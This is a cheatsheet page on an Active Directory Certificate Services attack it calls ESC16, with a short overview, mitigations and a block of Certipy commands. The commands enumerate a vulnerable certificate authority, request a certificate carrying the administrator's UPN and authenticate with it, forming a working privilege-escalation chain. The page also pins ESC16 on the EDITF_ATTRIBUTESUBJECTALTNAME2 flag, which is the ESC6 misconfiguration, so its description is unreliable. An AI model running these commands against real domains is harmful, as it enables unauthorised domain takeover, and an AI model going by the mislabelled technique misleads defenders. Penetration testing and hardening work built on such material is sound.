Back to Active Directory

Esc16

Active Directory cheatsheet — Active Directory enumeration and attack techniques.

Overview

ESC16 is an ADCS attack that exploits the EDITF_ATTRIBUTESUBJECTALTNAME2 flag on the CA server. When enabled, this allows certificate enrollees to specify Subject Alternative Names in their certificate requests, even on templates without CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT.

This enables privilege escalation by requesting certificates with arbitrary UPNs.

Category: Active Directory — Active Directory enumeration and attack techniques.

Key Commands & Payloads

The following commands and payloads are commonly used when testing for or exploiting Esc16:

certipy find -u user@domain.local -p 'password' -dc-ip 10.10.10.10 -vulnerable
certipy ca -ca 'CA-NAME' -list-templates -u user@domain.local -p 'password' -dc-ip 10.10.10.10
certipy req -u user@domain.local -p 'password' -ca 'CA-NAME' -target 'CA.domain.local' -template User -upn 'administrator@domain.local'
certipy auth -pfx administrator.pfx -dc-ip 10.10.10.10

Tools & Techniques

Recommended tools for Esc16:

  • Certipy: ADCS exploitation toolkit
  • Identify CA with EDITF_ATTRIBUTESUBJECTALTNAME2 flag
  • Template must allow enrollment by the attacker
  • Request certificate with victim UPN in SAN

Prevention & Mitigation

Security recommendations to prevent Esc16:

  • Disable EDITF_ATTRIBUTESUBJECTALTNAME2 CA flag
  • Audit CA configuration for dangerous settings
  • Implement proper CA security with Tier 0 controls
  • Monitor CA logs for certificate requests with unusual SANs

References

Additional resources: